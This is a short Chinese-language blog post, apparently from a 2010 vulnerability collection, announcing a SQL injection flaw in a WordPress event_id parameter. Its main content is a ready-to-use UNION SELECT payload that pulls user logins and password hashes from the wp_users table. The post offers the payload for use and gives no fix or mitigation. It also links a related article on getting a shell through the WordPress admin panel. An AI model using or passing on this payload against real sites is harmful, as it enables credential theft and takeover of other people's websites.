WordPress最新event_id注入漏洞

2010, February 6, 12:37 PM. 漏洞集研
Submitted by admin

新鲜的wordpress注入漏洞

===[ Exploit ]===
www.sitedir.com.cn/?event_id=[Sql]
www.sitedir.com.cn/Path/?event_id=[Sql]
Exploit:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

Tags: wordpress

« 上一篇 | 下一篇 »

只显示10条记录相关文章
WordPress后台拿shell (浏览: 15252, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):